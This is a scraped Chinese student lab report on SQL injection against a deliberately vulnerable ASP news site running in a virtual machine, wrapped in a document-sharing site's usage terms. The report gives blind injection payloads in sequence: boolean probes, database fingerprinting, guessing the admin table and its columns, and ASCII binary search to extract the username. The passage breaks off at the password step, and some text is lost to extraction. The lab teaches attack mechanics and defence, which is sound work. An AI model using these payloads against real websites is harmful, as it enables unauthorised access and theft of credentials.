SQL注入攻击实验报告.doc

  1. 1、本文档共15页,可阅读全部内容。
  2. 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
SQL注入攻击实验报告剖析

实验报告 (实验名称 :SQL注入攻击) 一、实验目的 通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施,加强对Web攻击的防范。 二、实验环境 描述实验的网络环境网络拓扑、IP地址、服务器、机信息 宿主机(客户机)IP为1,在主机上安装虚拟化软件 Vmware Player,在此基础上创建虚拟机并安装操作系统,进行网络配置,采用环回桥接模式 虚拟机(eb服务器)操作系统为indows XP,IP为, 本实验利用 windows 的 iis 服务搭建了一个有 SQL 注入漏洞的网站“ASP 新闻发 布系统”,以该网站为目标,对其实施 SQL 注入攻击。 本实验所需工具如下: IIS 是 Internet Information Server 的缩写,是微软提供的 Internet 服务器软 件,包括 Web、FTP、Mail 等服务器,也是目前常用的服务器软件。版本不限。 “啊 D”注入工具:对“MSSQL 显错模式”、“MSSQL 不显错模式”、“Access”等数 据库都有很好的注入检测能力,内集“跨库查询”、“注入点扫描”、“管理入口检测”、 “目录查看”等等于一身的注入工具包。 “ASP 新闻发布系统”Ok3w v4.6 源码。)实验环境选择适配器安装环回上安装,成功启动接着和的如图 是配置主机上的应该选择net8,并且勾取ridge 然后,验证和虚拟机是否联通显示连接成功 最后在虚拟机上安装,打开浏览器,输入地址“”,检查网站搭建情况。 (二)注入点 在宿主机上,打开网页/list.asp?id=95,可以正常打开页面。 进行注入测试,键入 /list.asp?id=95 and 1=1,返回页面不变。 键入 /list.asp?id=95 and 1=2,返回页面出错。 因此,可确定该网站存在注入点。 /list.asp?id=95 and (select count(*) from sysobjects)0 /list.asp?id=95 and (select count(*) from msysobjects)0 两者返回均出错,可知是 access 数据库。 (四)猜测表名 一般网站后台的管理员都默认在表 admin 中,我们先试一下,键入: /list.asp?id=95 and (select count(*) from admin)0 返回页面正常,可知该网站后台数据库中存在着表名为 admin 的表。 ()猜测字段名不同公司网站有不同的字段名,但一般都有三个字段,分别记录 ID 号、用户名和密码,常用的字段名为:id,username,password。 分别键入 /list.asp?id=95 and (select count(id) from admin)0 /list.asp?id=95 and (select count(username) from admin)0 /list.asp?id=95 and (select count(password) from admin)0 三者返回均正常。 可知,表 admin 中存在的三个字段:id,username,password。 ”的截图,但是正常望教员通融。 ()猜测管理员用户名和密码 .确定表 admin 中有几条记录,键入 /list.asp?id=95 and (select count(*) from admin)=1 返回页面正常。 可知,表 admin 只有一条记录。 2猜测用户名长度,键入 /list.asp?id=95 and (select len(username) from admin)=1 返回出错,继续键入 /list.asp?id=95 and (select len(username) from admin)=2 返回出错,继续测试 3/4/5…, 直到返回页面正确。测试到 5 的时候,返回正常。可知,用户名长度为 5。 3.猜测用户名内容,采用 ASCII 码分析法先猜测第1 位,用二分法,键入 /list.asp?id=95 and (select count(*) from admin where (asc(mid(username,1,1)))between 30 and 125)0 返回正确,进一步缩小范围 between 70 and 100 ,between 85 and 100 ,between 90 and 100,=97。 可知第一个字符为 a。 依此类推,猜测之后的每一位字符, 最后得到用户名为 admin。 4.猜测密码,同理: /list.asp?id=95 and (

文档评论(0)

jiayou10 + 关注
实名认证
内容提供者

该用户很懒,什么也没介绍

版权声明书
用户编号:8133070117000003

1亿VIP精品文档

相关文档